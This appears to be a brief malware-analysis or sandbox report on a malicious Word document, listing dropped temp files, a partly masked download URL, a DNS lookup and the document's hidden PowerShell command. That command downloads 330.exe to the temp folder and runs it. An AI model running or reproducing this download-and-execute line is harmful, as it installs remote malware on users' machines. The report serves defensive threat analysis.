Technical Information
- http://ka##il.com/test/330.exe as %temp%\330.exe
- <Current directory>\~wrd0000.tmp
- <Current directory>\~wrd0002.tmp
- <Current directory>\~wrl0003.tmp
- <PATH_SAMPLE>.doc
- http://ka##il.com/test/330.exe
- DNS ASK ka##il.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('http://ka##il.com/test/330.exe','%TEMP%\330.exe'); Start-Process('%TEMP%\330.exe')' (with hidden window)